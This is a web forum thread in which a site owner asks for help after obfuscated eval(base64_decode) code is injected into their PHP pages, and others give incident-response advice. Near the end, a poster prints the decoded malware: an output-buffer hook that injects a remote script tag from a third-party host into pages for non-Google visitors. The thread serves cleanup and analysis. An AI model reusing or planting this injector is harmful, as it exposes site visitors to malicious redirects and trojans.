Jump to content

Recommended Posts

On the first line of nearly all the php pages on my site the following has been inserted:

<?php /**/ eval(base64_decode(".................="));?>

 

dots replace actual code - it's about 3000 characters long

and when I go to the site I get redirected (sometimes) to some bogus site - the last one was adobeupdatemanager.org - and a warning in Firefox / Google "to get out of here".

 

This is a disaster! Is it a hack? How could it have happened? What should my first course of action be? What is the long term remedy? Can I post the code which I have omitted? I think it must be hex or something. I don't want to post the address of my site here.

 

Thanks for any help

Link to comment
https://forums.phpfreaks.com/topic/248982-has-my-site-been-hacked/
Share on other sites

Yes, it probably is a hack, either through direct access via ftp, or sql injection, or security exploits on a shared server. First thing would be to take the site down and start going through your Apache and DB server logs to see if anything stands out.

I haven't tried this one, but it looks like it should be as close to plug-n-play as you're gonna find . . .

 

http://perishablepress.com/press/2010/05/19/htaccess-redirect-maintenance-page-site-updates/

At this point you need to figure out if that script was the only thing compromised.

 

If you don't run your webserver you need to contact your hosting provider as well.  Use the phone this is not an email type situation.  You'll need to know if your account security was compromised.  If your billing information was taken, you'll possibly need to contact your credit card company and/or your bank and so forth.  Some insurance companies have identity theft coverage, talk to them about it.  Your provider could possibly have additional information and may want to take steps to bump up security, check for other intrusions and possibly report the incident to the authorities.  Make sure your provider tells you what they're doing about the situation, never accept the "we've handled it" line or if they tell you some such thing it may be time to switch providers.

 

If you have customer information stored on your webserver, you need to figure out if it was taken, if so you may need to (by law in some place) notify your customers.  Responsible security practices would have the site down until its fixed, then notify your customers when you know the extent of the data breach.

 

eval is one of those things I tend to disable with the suhosin patch.  base64_decode shows that the payload is encoded in base64, so its not hex.  You could switch the eval to echo to see what the payload actually is.  But please do so in a secure environment, a non-networked virtual machine is handy for this kind of analysis.

 

Until you know the extent of the intrusion you need to go into tinfoil hat mode.  You can start with running checks on your personal computer and afterwards password changes need to happen as well, with anything related to that account, billing login, ftp, mysql, panel, web services that your site may use, contact email account.

Thanks for those pieces of advice.

 

The htaccess worked fine and immediately, so now the site is down pointing to a maintenance message, which is at least a first step.

 

Fortunately I have next to no mysql (maybe some old databases, but not used) and no customer or login information or other sensitive info on the site - precisely because I felt I would not be able to guarantee safety, with my pretty weak coding experience.

 

So its really a matter of removing the bad code, which should be easy, then checking there are no more nasties, which will be fairly time consuming since it's a big site. Then finding the breach - my first guess is the php I've been writing over the summer left an obvious exploit!

 

But as you say if it's via FTP/password that's a much bigger problem as it'll imply a breach of my home computer or laptop where the password is stored, so I'd have to change all pws. My password is very long and complex so it can't have been guessed. I'll check with the host though too, just in case they've been exploited (would they tell me?). But if all those come up clean then it seems most likely my PHP has left an opening.

 

I can see the date all the files have been changed (less than a week ago) so I will try to check FTP logs for around that date.

 

I'm wondering now if it's someone sitting at a computer somewhere that has specifically targeted my site, or whether it's more likely to be a bot that automatically detects and exploits unsafe code. Not sure which would be worse.

 

a bot that automatically detects and exploits unsafe code

Bingo. We see quite a few of these kinds of 'hacked sites' that follow the same pattern, so it's unlikely you were targeted specifically (unless you think you have reason you would be.)

 

Find all instances of the base64_decode as a start, then take a look at the way you're handling any user inputs (especially things like file uploads.) Also as mentioned above, change your passwords, etc.

Thanks - I don't see any reason to be targeted specifically, but then after any attack (I guess it would be the same with a burglary) you can't help but wonder. To be honest you'd have to have a lot of free time on your hands to bother to bring down my site. I think the bot idea is more of a relief somehow, but it's going to be difficult to change all the code I've written. There is no uploading on the site, so that can't be it, but I do have a script that writes stuff on another page. Later on I'll post examples of my scripts to see if anyone can see a loophole.

 

I also did wonder about a guy who asked to advertise on the site. I inserted his code for a fee on one page - it looked legit, but he gave no contact details or anything. That was a month or two before this.

 

For reference, the actual exploit code is very similar to these two examples:

http://forums.oscommerce.com/topic/336693-i-have-been-hacked-help-please/

http://drupal.org/node/504010

(not sure what the rule for linking to these sorts of posts is, apologies if it's not allowed)

it's a long line of base 64, which I think first redirects google requests to a particular website, and then seems to unpack a whole bunch of stuff using gzdecode. I can't follow it after that. It looks really nasty.

 

I've contacted the host and they said it wasn't a breach on their part and they would look at the FTP logs.

Sure this is it:

 

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){   $GLOBALS['mr_no']=1;   if(!function_exists('mrobh')){      if(!function_exists('gml')){     function gml(){      if (!stristr($_SERVER["HTTP_USER_AGENT"],"google")){ return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9zd2VlcHN0YWtlc2FuZGNvbnRlc3RzaW5mby5jb20vanMucGhwP3M9MSI+PC9zY3JpcHQ+");      }      return "";     }    }        if(!function_exists('gzdecode')){     function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){      $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));      $RBE4C4D037E939226F65812885A53DAD9=10;      $RA3D52E52A48936CDE0F5356BB08652F2=0;      if($R30B2AB8DC1496D06B230A71D8962AF5D&4){       $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));       $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];       $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&{       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&16){       $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;      }      if($R30B2AB8DC1496D06B230A71D8962AF5D&2){       $RBE4C4D037E939226F65812885A53DAD9+=2;      }      $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));      if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){       $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;      }      return $R034AE2AB94F99CC81B389A1822DA3353;     }    }    function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){     Header('Content-Encoding: none');     $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);       if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){      return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);     }else{      return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();     }    }    ob_start('mrobh');   }  }

 

the first bit of 64code within code points to:

<script src="http://sweepstakesandcontestsinfo.com/js.php?s=1"></script>

 

The version discussed here, which looks similar, is dissected at the bottom of the thread, and has a trojan payload:

http://forums.oscommerce.com/topic/355864-base-64-infection/

 

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.